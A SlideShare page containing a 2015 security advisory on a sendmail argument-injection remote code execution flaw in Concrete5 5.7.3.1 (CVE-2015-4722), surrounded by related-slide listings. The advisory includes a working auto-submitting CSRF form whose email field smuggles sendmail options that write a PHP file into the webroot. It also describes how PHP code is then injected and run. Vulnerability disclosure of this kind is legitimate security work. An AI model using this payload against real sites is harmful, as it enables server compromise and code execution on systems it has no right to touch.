SlideShare a Scribd company logo
1 of 4
Download to read offline
Edition: 1.0
Last Edit: 24/06/2015
Cassification: Not restricted
Sendmail Remote Code
Execution Vulnerability in
Concrete5 version 5.7.3.1
Author: Egidio Romano
RCE via Sendmail in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/3
 Summary
Vulnerability Class Remote Code Execution (RCE)
CVE ID CVE-2015-4722
Remote Yes
Local No
Published June 6, 2015
Updated June 24, 2015
Credit Egidio Romano
Vulnerable Version 5.7.3.1 and probably prior versions
Fixed On 5.7.4
Other References https://hackerone.com/reports/59663
http://blog.mindedsecurity.com/2015/06/multiple-
security-issues-discovered-in-concrete5-part1.html
 Description
Concrete5 is vulnerable to a Remote Code Execution because it fails to properly validate
certain user input used as sender email address when sending out a registration
notification email. This vulnerability is mitigated by the fact that it can be exploited only
by authenticated administrator users (even though it could be exploited via a Cross Site
Request Forgery attack as well) and only if the email is being sent with sendmail.
 Vulnerability Details
The vulnerable code is located within the Open::update_registration_type() method:
File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53):
if ($this->isPost()) {
Config::save('concrete.user.registration.email_registration', ($this-
>post('email_as_username') ? true : false));
Config::save('concrete.user.registration.type', $this-
>post('registration_type'));
RCE via Sendmail in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 2/3
Config::save('concrete.user.registration.captcha', ($this-
>post('enable_registration_captcha')) ? true : false);
switch ($this->post('registration_type')) {
case "enabled":
Config::save('concrete.user.registration.enabled', true);
Config::save('concrete.user.registration.validate_email', false);
Config::save('concrete.user.registration.approval', false);
Config::save('concrete.user.registration.notification', $this-
>post('register_notification'));
Config::save(
'concrete.user.registration.notification_email',
Loader::helper('security')->sanitizeString(
$this->post('register_notification_email')));
…
User input passed through the “register_notification_email” POST parameter is not
properly sanitized before being stored into a configuration setting (the sanitizeString()
method doesn’t check if it is a valid email address). This value is used as a sender email
address to send out a notification email when a new user is being registered, and this is
done using the PHP mail() function, specifically passing such value to its fifth parameter.
So, when sendmail is used to send out such an email, it is possible to alter the command
line and tell the sendmail program to log all the email traffic in an arbitrary file chosen by
the attacker, resulting in an arbitrary PHP code execution.
 Exploitation Details
An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to
force an authenticated administrator user into browsing to a web page like this:
<html>
<body>
<form method="POST"
action="http://[host]/index.php/dashboard/system/registration/open/update_registration_typ
e">
<input type="hidden" name="registration_type" value="enabled">
<input type="hidden" name="register_notification" value="1">
<input type="hidden" name="register_notification_email" value="a@b.com -
OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php">
<input type="hidden" name="ccm-submit-registration-type-form" value="Save">
</form><script>document.forms[0].submit()</script>
</body>
</html>
RCE via Sendmail in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 3/3
When the victim user will browse to this page, the Public Registration Settings will be
modified in a way that when a new user will be registered the following command line
will be executed to send out a notification email (in case sendmail is used):
/usr/sbin/sendmail -t –i –f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php
This will log all the email traffic into a test.php file located within the /updates/ directory
of the Concrete5 webroot (which should be writable by the user running the web server).
So the next step for the attacker is to register a new account and put some malicious PHP
code after the email address, something like this:
When the new account will be created a notification email will be sent, thus the attacker
can browse to http://[host]/updates/test.php in order to execute the injected PHP code:

More Related Content

Viewers also liked

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS DeobfuscationMinded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sOnyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKGuardSquare
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsCognizant
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing!   hem...Mobile application security – effective methodology, efficient testing!   hem...
Mobile application security – effective methodology, efficient testing! hem...owaspindia
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingJason Haddix
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...Ajin Abraham
 

Viewers also liked (20)

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing!   hem...Mobile application security – effective methodology, efficient testing!   hem...
Mobile application security – effective methodology, efficient testing! hem...
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
 

Similar to Concrete5 Sendmail RCE Advisory

Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing ReportAman Srivastava
 
Protocol
ProtocolProtocol
Protocolm_bahba
 
Pentest Expectations
Pentest ExpectationsPentest Expectations
Pentest ExpectationsIhor Uzhvenko
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013testslidesha12
 
Input validation slides of web application workshop
Input validation slides of web application workshopInput validation slides of web application workshop
Input validation slides of web application workshopPayampardaz
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample ReportOctogence
 
Benefits of the CodeIgniter Framework
Benefits of the CodeIgniter FrameworkBenefits of the CodeIgniter Framework
Benefits of the CodeIgniter FrameworkToby Beresford
 
SharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox developmentSharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox developmentElaine Van Bergen
 
58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-services58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-serviceshomeworkping3
 
Security vulnerabilities of 2015
Security vulnerabilities of 2015Security vulnerabilities of 2015
Security vulnerabilities of 2015dogangcr
 
HTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PMHTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PMDean Hamstead
 
Simplify your professional web development with symfony
Simplify your professional web development with symfonySimplify your professional web development with symfony
Simplify your professional web development with symfonyFrancois Zaninotto
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Bank One App Sec Training
Bank One App Sec TrainingBank One App Sec Training
Bank One App Sec TrainingMike Spaulding
 
Building Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in RailsBuilding Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in RailsJim Jeffers
 

Similar to Concrete5 Sendmail RCE Advisory (20)

Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
 
Protocol
ProtocolProtocol
Protocol
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
Pentest Expectations
Pentest ExpectationsPentest Expectations
Pentest Expectations
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
 
Input validation slides of web application workshop
Input validation slides of web application workshopInput validation slides of web application workshop
Input validation slides of web application workshop
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample Report
 
Benefits of the CodeIgniter Framework
Benefits of the CodeIgniter FrameworkBenefits of the CodeIgniter Framework
Benefits of the CodeIgniter Framework
 
50063
5006350063
50063
 
SharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox developmentSharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox development
 
58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-services58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-services
 
Security vulnerabilities of 2015
Security vulnerabilities of 2015Security vulnerabilities of 2015
Security vulnerabilities of 2015
 
HTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PMHTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PM
 
Simplify your professional web development with symfony
Simplify your professional web development with symfonySimplify your professional web development with symfony
Simplify your professional web development with symfony
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Bank One App Sec Training
Bank One App Sec TrainingBank One App Sec Training
Bank One App Sec Training
 
Building Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in RailsBuilding Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in Rails
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014
 

More from Minded Security

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Minded Security
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Minded Security
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'tsMinded Security
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Minded Security
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci  Isaca Venice - 2017Matteo Meucci  Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Minded Security
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017Minded Security
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci   Software Security - Napoli 10112016Matteo meucci   Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Minded Security
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Minded Security
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 

More from Minded Security (12)

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'ts
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking Demo
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci  Isaca Venice - 2017Matteo Meucci  Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci   Software Security - Napoli 10112016Matteo meucci   Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci   Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
PHP Object Injection
PHP Object InjectionPHP Object Injection
PHP Object Injection
 

Recently uploaded

Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsJaydeep Chhasatia
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...OnePlan Solutions
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
 
Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024Mind IT Systems
 
Deep Learning for Images with PyTorch - Datacamp
Deep Learning for Images with PyTorch - DatacampDeep Learning for Images with PyTorch - Datacamp
Deep Learning for Images with PyTorch - DatacampVICTOR MAESTRE RAMIREZ
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyRaymond Okyere-Forson
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilVICTOR MAESTRE RAMIREZ
 
How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?AmeliaSmith90
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLAlluxio, Inc.
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.Sharon Liu
 
IA Generativa y Grafos de Neo4j: RAG time
IA Generativa y Grafos de Neo4j: RAG timeIA Generativa y Grafos de Neo4j: RAG time
IA Generativa y Grafos de Neo4j: RAG timeNeo4j
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesShyamsundar Das
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Incrobinwilliams8624
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionsNirav Modi
 
Kawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorShane Coughlan
 
online pdf editor software solutions.pdf
online pdf editor software solutions.pdfonline pdf editor software solutions.pdf
online pdf editor software solutions.pdfMeon Technology
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfBrain Inventory
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfTobias Schneck
 

Recently uploaded (20)

Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024
 
Deep Learning for Images with PyTorch - Datacamp
Deep Learning for Images with PyTorch - DatacampDeep Learning for Images with PyTorch - Datacamp
Deep Learning for Images with PyTorch - Datacamp
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human Beauty
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-Council
 
Salesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptxSalesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptx
 
How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
 
IA Generativa y Grafos de Neo4j: RAG time
IA Generativa y Grafos de Neo4j: RAG timeIA Generativa y Grafos de Neo4j: RAG time
IA Generativa y Grafos de Neo4j: RAG time
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security Challenges
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Inc
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspections
 
Kawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in Trivandrum
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS Calculator
 
online pdf editor software solutions.pdf
online pdf editor software solutions.pdfonline pdf editor software solutions.pdf
online pdf editor software solutions.pdf
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdf
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
 

Concrete5 Sendmail RCE Advisory

  • 1. Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Sendmail Remote Code Execution Vulnerability in Concrete5 version 5.7.3.1 Author: Egidio Romano
  • 2. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/3  Summary Vulnerability Class Remote Code Execution (RCE) CVE ID CVE-2015-4722 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59663 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to a Remote Code Execution because it fails to properly validate certain user input used as sender email address when sending out a registration notification email. This vulnerability is mitigated by the fact that it can be exploited only by authenticated administrator users (even though it could be exploited via a Cross Site Request Forgery attack as well) and only if the email is being sent with sendmail.  Vulnerability Details The vulnerable code is located within the Open::update_registration_type() method: File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53): if ($this->isPost()) { Config::save('concrete.user.registration.email_registration', ($this- >post('email_as_username') ? true : false)); Config::save('concrete.user.registration.type', $this- >post('registration_type'));
  • 3. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/3 Config::save('concrete.user.registration.captcha', ($this- >post('enable_registration_captcha')) ? true : false); switch ($this->post('registration_type')) { case "enabled": Config::save('concrete.user.registration.enabled', true); Config::save('concrete.user.registration.validate_email', false); Config::save('concrete.user.registration.approval', false); Config::save('concrete.user.registration.notification', $this- >post('register_notification')); Config::save( 'concrete.user.registration.notification_email', Loader::helper('security')->sanitizeString( $this->post('register_notification_email'))); … User input passed through the “register_notification_email” POST parameter is not properly sanitized before being stored into a configuration setting (the sanitizeString() method doesn’t check if it is a valid email address). This value is used as a sender email address to send out a notification email when a new user is being registered, and this is done using the PHP mail() function, specifically passing such value to its fifth parameter. So, when sendmail is used to send out such an email, it is possible to alter the command line and tell the sendmail program to log all the email traffic in an arbitrary file chosen by the attacker, resulting in an arbitrary PHP code execution.  Exploitation Details An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to force an authenticated administrator user into browsing to a web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/registration/open/update_registration_typ e"> <input type="hidden" name="registration_type" value="enabled"> <input type="hidden" name="register_notification" value="1"> <input type="hidden" name="register_notification_email" value="a@b.com - OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php"> <input type="hidden" name="ccm-submit-registration-type-form" value="Save"> </form><script>document.forms[0].submit()</script> </body> 